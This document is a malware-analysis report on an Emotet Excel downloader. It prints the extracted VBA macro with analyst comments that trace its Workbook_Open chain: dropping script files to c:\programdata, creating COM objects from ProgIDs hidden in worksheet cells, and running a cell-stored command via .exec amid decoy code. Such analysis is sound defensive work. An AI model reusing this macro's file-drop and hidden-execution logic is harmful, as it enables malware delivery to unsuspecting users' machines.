Malware Insights
The sample is identified as malicious by ClamAV and exhibits high-severity heuristics for VBA macros, including a Workbook_Open auto-execution event and CreateObject calls. The embedded VBA macro attempts to execute a VBScript payload located at 'c:\programdata\tjspowj.vbs' and a batch file at 'c:\programdata\uidpjewl.bat'. The batch file contains obfuscated commands that appear to download and execute payloads from multiple URLs. The VBA script itself also contains a long, concatenated string that reconstructs a series of URLs, likely for downloading additional malicious content.
Heuristics 6
-
ClamAV: Xls.Downloader.Emotet-ab81c42b2bd4747e-9951196-0 — critical — CLAMAV_DETECTION — ClamAV detected this file as malware: Xls.Downloader.Emotet-ab81c42b2bd4747e-9951196-0
-
Reference to Windows Script Host — high — SC_STR_WSCRIPT — Reference to Windows Script Host
-
VBA macros detected — medium — 3 related findings — OLE_VBA_MACROS — Document contains VBA macro code
-
CreateObject call — high — OLE_VBA_CREATEOBJ — CreateObject call. Matched line in script:
If strOut = "g457dt" Then Set objWordApp = CreateObject("Word.Application") objWordApp.documents.Add
-
VBA p-code auto-exec with execution tokens — high — OLE_VBA_PCODE_AUTOEXEC_EXEC — Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Workbook_Open macro — low — OLE_VBA_WBOPEN — Workbook_Open macro. Matched line in script:
End Sub Private Sub Workbook_Open() Dim lngAge As Long
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13985 bytes |

SHA-256: faf50200d5a9adeeda00cc1da1bbf8f6abf0317a1e97a58db8ae804ba12ba446
Preview script: first 1,000 lines of the extracted script
' Analyst note: module "Fbhndfghsret3". The VB_Base GUID {00020819-...} is the
' Excel Workbook class, so this is the workbook's document module; that is why
' the Workbook_Open auto-execution handler is defined in it.
Attribute VB_Name = "Fbhndfghsret3"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Aggregation-mode constants (sum, average, max, min, several counts).
' In this listing they are only named in the Select Case of
' fHasegfasdfaqw35ysdfhgdg; none of the procedures reached from Workbook_Open
' reads them, so they look like leftovers of borrowed spreadsheet-utility code.
Const dhcSum As Integer = 0
Const dhcAvg As Integer = 1
Const dhcMax As Integer = 2
Const dhcMin As Integer = 3
Const dhcCount As Integer = 4
Const dhcSumPlus As Integer = 5
Const dhcSumMinus As Integer = 6
Const dhcCountFull As Integer = 7
Const dhcCountNotNull As Integer = 8
Const dhcCountPlus As Integer = 9
Const dhcCountMinus As Integer = 10
' Analyst note: filler procedure. Nothing in this listing calls it.
' It walks a yes/no question table on a worksheet named "Data" (text in
' column 1, next-row numbers in columns 2 and 3, row count in D1) and shows
' message boxes whose text is random characters. It performs no file, object
' or process activity and can be deprioritised during triage.
Sub ghsdrsDERGshdhsrse5wasd()
Dim intLastRow As Integer
Dim intRow As Integer
Dim intYesRow As Integer
Dim intNoRow As Integer
Dim strText As String
Dim strNewName As String
Dim strNewQuestion As String
Dim intRes As Integer
MsgBox "fgzdsrfyhgj myjdf. Gaserfhlsd srhtgius.", vbOKOnly, _
"gharagsdf"
intLastRow = Worksheets("Data").Range("D1").Value + 1
intRow = 1
Do While intRow < intLastRow
strText = Worksheets("Data").Cells(intRow, 1).Value
intYesRow = Worksheets("Data").Cells(intRow, 2).Value
intNoRow = Worksheets("Data").Cells(intRow, 3).Value
If intYesRow > 0 Then
intRes = MsgBox(strText, vbYesNo, "hueswrfg")
If intRes = vbYes Then
intRow = intYesRow
Else
intRow = intNoRow
End If
Else
' intRow is not advanced on this branch, so the loop would repeat on the
' same row; another sign the routine is not meant to be run.
intRes = MsgBox("weg " & strText & "d", vbYesNo, "rtgwae")
End If
Loop
End Sub
' Analyst note: auto-execution entry point (runs when the workbook is opened
' with macros enabled). The age/date arithmetic is cover; the security-relevant
' work is appended to otherwise innocuous lines with ":" statement separators:
'   1. kjDygzs34e.Caption <- Cells(105, 7) + CRLF + Cells(103, 6)   (G105, F103)
'   2. kjDygzs34e.Tag     <- Cells(102, 5) with the filler "uwpe" removed (E102)
'   3. hsdFghawoyhitshdg is called; it writes Caption and Tag to disk
'   4. kjDygzs34e.trgsEtgseg.Text is set, which raises trgsEtgseg_Change in the
'      form module and continues the chain there
' The strings that matter (file contents, paths, ProgIDs, command line) are
' held in worksheet cells rather than in the macro source, so review the cell
' values of the sample as well as this listing.
Private Sub Workbook_Open()
Dim lngAge As Long
Dim datDate As Date
' One logical line: two cover statements followed by staging step 1.
datDate = Now: lngAge = DateDiff("yyyy", _
datDate, Date): kjDygzs34e.Caption = Cells(105, 7) + _
vbCrLf & Cells(103, 6)
If DateSerial(Year(datDate) + lngAge, Month(datDate), _
Day(datDate)) > Date Then
lngAge = lngAge - 1
End If
' One logical line: cover statement, staging step 2, the file-writing call
' (step 3), an assignment to the otherwise unused name dhCalculateAge, and
' the textbox write that triggers the form's Change handler (step 4).
lngAge = lngAge + 1: kjDygzs34e.Tag = Replace(Cells(102, 5), _
"uwpe", ""): hsdFghawoyhitshdg Range("D147"), Range("A203"): dhCalculateAge = _
lngAge: kjDygzs34e.trgsEtgseg.Text = ":"
End Sub
' Analyst note: file-drop primitive disguised as an "export selection to HTML"
' routine.
'   ghoiwue  - path of the file to create/overwrite (Open ... For Output)
'   tyo3oe   - text written to that file (Print #i)
'   HSere4yd - never read in the body
' Only Open / Print # / Close touch the file. The HTML string built in strOut
' is never written anywhere. Both callers in this listing pass a worksheet cell
' as the path; the report summary names c:\programdata\tjspowj.vbs and
' c:\programdata\uidpjewl.bat - presumably those cell values; confirm against
' the sample.
Sub HstgsAgsw4Rfhsf(ghoiwue As String, tyo3oe As String, HSere4yd As Boolean)
Dim strStyle As String: Dim strAlign As String: Dim strOut As String
Dim cell As Object: Dim strCellText As String: Dim lngRow As Long
Dim lngLastRow As Long: Dim strTemp As String
Dim objWordApp As Object
' i = 1 is used as the file number; the Open at the end of this logical line
' creates or truncates the target file.
Dim i As Long: i = 1: lngLastRow = _
Selection.Row: Open ghoiwue For Output As #i
For Each cell In Selection
lngRow = cell.Row
' i was set to 1 above and is only reassigned inside this branch, so the
' condition is never true: the whole cell-formatting block is dead code.
If i < 0 Then
If lngRow <> lngLastRow Then
strOut = strOut & vbTab & "</tr>" & vbCrLf & vbTab & _
"<tr>" & vbCrLf
lngLastRow = lngRow
End If
If Not IsNull(cell.Font.Size) Then
strStyle = " style=" & "font-size: " & Int(100 * _
cell.Font.Size / 19) & "%;"
End If
If cell.Font.Bold Then
strCellText = "<b>" & strCellText & "</b>"
End If
If cell.HorizontalAlignment = xlRight Then
strAlign = " align=" & "right"
ElseIf cell.HorizontalAlignment = xlCenter Then
strAlign = " align=" & "center"
Else
strAlign = ""
End If
strCellText = cell.Text
If cell.Orientation <> xlHorizontal Then
strTemp = ""
For i = 1 To Len(strCellText)
strTemp = strTemp & Mid$(strCellText, i, 1) & "<br>"
Next i
strCellText = strTemp
strStyle = ""
End If
End If
strOut = strOut & vbTab & vbTab & "<td" & strStyle & strAlign _
& ">" & strCellText & "</td>" & vbCrLf
Next
' The payload text is written here, appended to a cover statement.
strOut = vbTab & "<tr>" & vbCrLf & strOut & vbTab & _
"</tr>" & vbCrLf: Print #i, tyo3oe
' File handle is closed here, again appended to a cover statement.
strOut = "<table border=1 cellpadding=3 cellspacing=1>" & vbCrLf & _
strOut & vbCrLf & "</table>": Close #i
' strOut was just assigned a string beginning with "<table", so this
' comparison cannot succeed and the Word.Application branch is unreachable.
' This is the line the OLE_VBA_CREATEOBJ heuristic matched; the CreateObject
' calls that do run are in the form module and take their ProgID from cells.
If strOut = "g457dt" Then
Set objWordApp = CreateObject("Word.Application")
objWordApp.documents.Add
objWordApp.Selection = strOut
objWordApp.Selection.Copy
objWordApp.Visible = True
Set objWordApp = Nothing
End If
End Sub
' Analyst note: presented as a weighted-average function, but its purpose on
' the execution path is the two HstgsAgsw4Rfhsf calls, each of which writes a
' file:
'   - path from Cells(101, 10) (J101), content = kjDygzs34e.Caption
'   - path from Cells(104, 12) (L104), content = kjDygzs34e.Tag
' Workbook_Open calls it with two single-cell ranges, so the count guard below
' does not exit early, and it discards the numeric result.
Function hsdFghawoyhitshdg(rgWeights As Range, rgValues As Range) _
As Double
If (rgWeights.Count <> rgValues.Count) Then
hsdFghawoyhitshdg = 0
Exit Function
End If
Dim dblSum As Double: Dim dblSumWeight As Double
' First file write, appended to a variable declaration.
Dim i As Integer: HstgsAgsw4Rfhsf Cells(101, 10), _
kjDygzs34e.Caption, True
For i = 1 To rgWeights.Count
dblSumWeight = dblSumWeight + rgWeights(i) * rgValues(i)
dblSum = dblSum + rgWeights(i)
Next
If dblSum < 0.1 Then dblSum = 1
' Second file write.
HstgsAgsw4Rfhsf Cells(104, 12), kjDygzs34e.Tag, False
hsdFghawoyhitshdg = dblSumWeight / dblSum
End Function
' Analyst note: module "GhFdrtdSrt4ufg". The VB_Base GUID {00020820-...} is the
' Excel Worksheet class; the module has no code in this listing.
Attribute VB_Name = "GhFdrtdSrt4ufg"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Analyst note: module "kjDygzs34e". The two-GUID VB_Base form and the use of
' Me.Controls and control event handlers below indicate a UserForm. The
' workbook module uses its Caption and Tag properties as holding areas for
' strings read from cells, and nothing in this listing calls Show on it.
Attribute VB_Name = "kjDygzs34e"
Attribute VB_Base = "0{B6874302-9604-4C36-98C0-C6611BDCEF6F}{57CDD0AB-1AE3-48D4-9215-12C912879B63}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Of these module-level variables only gjosibfsd and nbgldfif are referenced
' elsewhere in the listing: nbgldfif receives the first CreateObject result
' (AcivelOfstAdrs), gjosibfsd the object that nbgldfif.CreateObject returns
' (GFhsdrffhDFHse4ydkjugxkic), and gjosibfsd.exec is the execution call
' (ghsethkaw4tdThsreSrgsjhiwe78). The remaining names are unused.
Public aesrghiyasdg, ghasRYafh378gswd As String
Public sdehfSRRyawdef, sdehsFghrtyds, r4y6difuhbgkj As Variant
Public gjosibfsd, nbgldfif As Object
Public sehklslslqwho8uesgeharGASDgaw3eg As Boolean
' Analyst note: cover code. Aggregates the values of cells in strRange whose
' fill colour (fBackBolor = True) or font colour matches lngColor, or does not
' match it when fAbsence is set; intMode selects the aggregate via the dhc*
' names. The result is assigned to the name ColorCalc rather than to the
' function's own name, so as written the function never sets its return value,
' which suggests a renamed copy of a utility called ColorCalc. No procedure in
' this listing calls it and it performs no file, object or process activity.
Public Function fHasegfasdfaqw35ysdfhgdg(strRange As String, _
lngColor As Long, fBackBolor As Boolean, _
intMode As Integer, Optional fAbsence As Boolean) As Double
Dim rgData As Range
Dim i As Integer
Dim Values() As Variant
Dim intCount As Integer
Dim cell As Range
Dim varOut As Variant
Set rgData = Range(strRange)
ReDim Values(1 To rgData.Count)
' Collect the values of the cells that pass the colour test.
For Each cell In rgData.Cells
If fBackBolor = True Then
If fAbsence Then
If cell.Interior.Color <> lngColor Then
intCount = intCount + 1
Values(intCount) = cell.Value
End If
Else
If cell.Interior.Color = lngColor Then
intCount = intCount + 1
Values(intCount) = cell.Value
End If
End If
Else
If fAbsence Then
If cell.Font.Color <> lngColor Then
intCount = intCount + 1
Values(intCount) = cell.Value
End If
Else
If cell.Font.Color = lngColor Then
intCount = intCount + 1
Values(intCount) = cell.Value
End If
End If
End If
Next cell
' Fold the collected values according to intMode.
For i = 1 To intCount
Select Case intMode
Case dhcSum, dhcAvg
varOut = varOut + Values(i)
Case dhcSumPlus
If Values(i) > 0 Then varOut = varOut + Values(i)
Case dhcSumMinus
If Values(i) < 0 Then varOut = varOut + Values(i)
Case dhcMax
If Values(i) > varOut Then varOut = Values(i)
Case dhcMin
If i = LBound(Values) Then varOut = Values(i)
If Values(i) < varOut Then varOut = Values(i)
Case dhcCount
varOut = varOut + 1
Case dhcCountFull
If Not IsEmpty(Values(i)) Then varOut = varOut + 1
Case dhcCountNotNull
If Not IsEmpty(Values(i)) And Values(i) <> 0 Then _
varOut = varOut + 1
Case dhcCountPlus
If Values(i) > 0 Then varOut = varOut + 1
Case dhcCountMinus
If Values(i) < 0 Then varOut = varOut + 1
End Select
Next i
If intMode = dhcAvg Then
ColorCalc = varOut / intCount
Else
ColorCalc = varOut
End If
End Function
' Analyst note: third link of the chain, called from AcivelOfstAdrs.
' Security-relevant actions, both hidden on multi-statement lines:
'   - Set gjosibfsd = nbgldfif.CreateObject(<Cells(101, 17)>, "")
'     i.e. a second object is obtained through the object created in
'     AcivelOfstAdrs, with the ProgID read from cell Q101.
'   - ghsethkaw4tdThsreSrgsjhiwe78 is called, which invokes gjosibfsd.exec.
' The formula-building code around them is cover.
' NOTE(review): the ProgID is not visible in this listing. The report's
' "Reference to Windows Script Host" heuristic suggests a WSH-related string
' somewhere in the file - confirm against the cell values.
Sub GFhsdrffhDFHse4ydkjugxkic()
Dim strFormula As String: Dim intMode As String
' Caption is cleared here and later passed as the second CreateObject argument.
bSretgsrhjl.Caption = ""
' Cover: early exits that depend on the value of Cells(204, 29) (AC204).
If Cells(204, 29).Value = "d" Then
MsgBox "etysdigfsigDSFHsdtjh sthjSte54y7sdrtgh sbsidy78us", _
vbCritical, "tysdoihf shdo!"
txtResCell.SetFocus
Exit Sub
ElseIf Cells(204, 29).Value = "f" Then
MsgBox "tghwoeui fhiwuegfisudogihwoeyis sgid", _
vbCritical, "hasewrt!"
txtRange.SetFocus
Exit Sub
End If
lngCurColor = "869392"
' One logical line: the ProgID is copied from the cell into a control's Tag,
' a cover formula string is built, then the indirect CreateObject call runs.
rGHJdtfgh54.Tag = Cells(101, 17): strFormula = "=ColorCalc(" & """" & "," & lngCurColor & "," & _
CInt(cbrfhiw7swdg.Top) & "," & intMode & "," & CInt(rGHJdtfgh54.Height) & _
")": Set gjosibfsd = nbgldfif.CreateObject(rGHJdtfgh54.Tag, _
bSretgsrhjl.Caption)
' Cover assignment followed by the call that performs the execution step.
txtResCell = Cells(345, 83): ghsethkaw4tdThsreSrgsjhiwe78
' strFormula always begins with "=ColorCalc(", so this comparison is never
' true and no formula is written.
If strFormula = "," Then Range(txtResCell.Value).Formula = strFormula
End Sub
' Analyst note: cover code shaped like a form-control validation handler
' (it takes a Cancel argument). Nothing in this listing calls it. It checks
' that a textbox is non-empty and that the result cell does not lie inside the
' input range, and reports problems through message boxes with random text.
' It performs no file, object or process activity.
Sub DFgasfashefiawt7a89sudfoiasd(ByVal Cancel As MSForms.ReturnBoolean)
Dim rgData As Range
Dim cell As Range
If trgsEtgseg.Text = "" Then
MsgBox "hSDhsdfg aSeRaw3tysdthjsdfgA asEfaW4ydThsdf!", _
vbCritical, "rgjao gh4iausghi"
Cancel = True
End If
If trgsEtgseg.Text = "" Then Exit Sub
On Error GoTo Err1
Set rgData = Range(txtRange.Text)
For Each cell In rgData.Cells
If cell.Address(False, False) = _
Range(txtResCell.Text).Address(False, False) Then
MsgBox "dfagiweu fasidygfa8us7e6rt8dfsdgfHDFSjSTGh sertg " & _
"ghasdiag eyurgfisdf", vbCritical, _
"sdfgiuwegse!"
Cancel = True
Exit Sub
End If
Next cell
Exit Sub
Err1:
' 1004 gets its own message; any other error shows Err.Description.
If Err.Number = 1004 Then
MsgBox "rgsas ikjubvgasegase a4tasdf", vbCritical, _
"bcvuyasfeu 4eughtkoidcsbs"
Cancel = True
Exit Sub
Else
MsgBox Err.Description, vbCritical, "gasgfku 45oyitjlkihjh"
Cancel = True
Exit Sub
End If
End Sub
' Analyst note: Change handler for the control trgsEtgseg. Workbook_Open
' assigns kjDygzs34e.trgsEtgseg.Text, which raises this event, so the handler
' runs without user interaction and without the form being shown. Its only
' relevant action is the call to AcivelOfstAdrs appended to the formula line;
' the AVERAGE formula string is cover and is assigned to the bare name
' Formula, which appears to be an undeclared variable rather than a cell
' property.
Private Sub trgsEtgseg_Change()
Dim strFistCell As String
Dim strLastCell As String
Dim strFormula As String
' The chain stops here only if the active cell is on row 13592.
If ActiveCell.Row = 13592 Then Exit Sub
strFistCell = Cells(1500, 34).Offset(-1, 0).End(xlUp).Address
strLastCell = Cells(1250, 35).Offset(-1, 0).Address
' One logical line: cover string concatenation, then the call that continues
' the execution chain.
strFormula = "=AVERAGE(" & strFistCell & ":" & _
strLastCell & ")": AcivelOfstAdrs
Formula = strFormula
End Sub
' Analyst note: second link of the chain, called from trgsEtgseg_Change.
' Between list-box population statements it:
'   - copies Cells(104, 9) (I104) into rGHJdtfgh54.Caption, and
'   - runs Set nbgldfif = CreateObject(<that caption>),
' so the ProgID of the first COM object comes from a worksheet cell and does
' not appear in the macro source.
' The If branch requires the selection to hold exactly 154702 cells, a count
' an ordinary selection will not match; the Else branch, which calls
' GFhsdrffhDFHse4ydkjugxkic, is therefore the expected path.
Sub AcivelOfstAdrs()
Dim intFunc As Integer
Dim strFunc As String
cbrfhiw7swdg.AddItem "0": cbrfhiw7swdg.List(0, 1) = "erfgisd7": cbrfhiw7swdg.AddItem "1"
cbrfhiw7swdg.List(1, 1) = "jer6": cbrfhiw7swdg.AddItem "2"
cbrfhiw7swdg.List(2, 1) = "gaeww"
' ProgID staged from the cell, appended to a cover AddItem call.
cbrfhiw7swdg.AddItem "3": rGHJdtfgh54.Caption = Cells(104, 9)
' One logical line: two cover list statements, then the CreateObject call.
cbrfhiw7swdg.List(3, 1) = "rtyqae": cbrfhiw7swdg.AddItem "4": cbrfhiw7swdg.List(4, 1) = _
"dsfgh bqias": Set nbgldfif = CreateObject(rGHJdtfgh54.Caption)
If Selection.Cells.Count = 154702 Then
' Cover: parses the arguments of an existing ColorCalc(...) formula back
' into form controls.
intFunc = InStr(Selection.Formula, "ColorCalc(")
If intFunc > 0 Then
txtResCell.Text = Selection.Address(False, False)
strFunc = Mid(Selection.Formula, intFunc + 11)
intFunc = InStr(strFunc, """")
txtRange.Text = Left(strFunc, intFunc - 1)
strFunc = Mid(strFunc, intFunc + 2)
intFunc = InStr(strFunc, ",")
strFunc = Mid(strFunc, intFunc + 1)
intFunc = InStr(strFunc, ",")
tglType.Value = Left(strFunc, intFunc - 1)
strFunc = Mid(strFunc, intFunc + 1)
strFunc = Left(strFunc, Len(strFunc) - 1)
intFunc = InStr(strFunc, ",")
cboCalcTypes.Text = cboCalcTypes.List(Val(Left$( _
strFunc, intFunc - 1)), 1)
strFunc = Mid(strFunc, intFunc + 1)
chkVarify.SetFocus
chkVarify.Value = CBool(strFunc)
lblChoose.Visible = True
Else
txtRange.Value = Selection.Address(False, False)
cboCalcTypes.Text = "hasderf"
End If
Else
' Expected path: hand over to the next stage.
trgsEtgseg.Tag = "rh": GFhsdrffhDFHse4ydkjugxkic
cbrfhiw7swdg.Text = "ryaweroir"
End If
End Sub
' Analyst note: final link of the chain and the execution step, called from
' GFhsdrffhDFHse4ydkjugxkic. Inside what reads as colour-palette code it:
'   - sets sgfhnDTdkjF.Tag to Cells(99, 8) (H99) with the filler "ghwuy"
'     removed, and
'   - calls gjosibfsd.exec with that string, on the object created in
'     GFhsdrffhDFHse4ydkjugxkic.
' The command line is therefore assembled from a worksheet cell at run time
' and is not present in the macro source. For detection, the observable
' behaviour of the whole chain is Excel writing script files (the report
' names two under c:\programdata) and then starting a child process.
' NOTE(review): the command string itself is not visible in this listing -
' recover it from cell H99 of the sample.
Sub ghsethkaw4tdThsreSrgsjhiwe78()
Dim rgCells As Range
Dim i As Integer
Dim intColorNumber As Integer
Dim lngCurColor As Long
Dim fColorPresented As Boolean
Dim tglType As Range
Dim ctrl As Control
Dim strCtrl As String
Dim fBackColor As Boolean
Set tglType = Cells(354, 100)
fBackColor = tglType.Value
' Errors are suppressed while controls named cmbColor* are hidden (cover).
On Error Resume Next
For Each ctrl In Me.Controls
If Left(ctrl.Name, 8) = "cmbColor" Then
ctrl.Visible = False
End If
Next ctrl
On Error GoTo ErrRange
' Command string staged: cell value with the filler substring stripped.
sgfhnDTdkjF.Tag = Replace(Cells(99, 8), "ghwuy", "")
Set rgCells = Range("G350:G352")
On Error GoTo 0
If fBackColor = False Then
lngCurColor = rgCells.Cells(i).Font.Color
Else
lngCurColor = rgCells.Cells(i).Interior.Color
End If
cbrfhiw7swdg.BackColor = lngCurColor: cbrfhiw7swdg.Visible = True
' Execution: the staged string is passed to .exec, appended to a cover
' assignment.
intColorNumber = 2: gjosibfsd.exec sgfhnDTdkjF.Tag
' Everything below is cover: it compares cell colours with control colours
' and builds strCtrl, which is never used.
For i = 2 To rgCells.Cells.Count
fColorPresented = False
If fBackColor = False Then
lngCurColor = rgCells.Cells(i).Font.Color
Else
lngCurColor = rgCells.Cells(i).Interior.Color
End If
For Each ctrl In Me.Controls
If Left(ctrl.Name, 8) = "cmbColor" And _
ctrl.Visible = True Then
If lngCurColor = ctrl.BackColor Then
fColorPresented = True
Exit For
End If
End If
Next ctrl
If Not fColorPresented Then
intColorNumber = intColorNumber + 1
strCtrl = "cmbColor" & intColorNumber
End If
Next i
Exit Sub
ErrRange:
If cbrfhiw7swdg.Text = "grec" Then
MsgBox "dgfqh8ir7gw giw3uegksdjbfklswregw g6tfyuefishvoldbfjodfi", _
vbCritical, "gasgfquiyew!"
End If
cbrfhiw7swdg.SetFocus
End Sub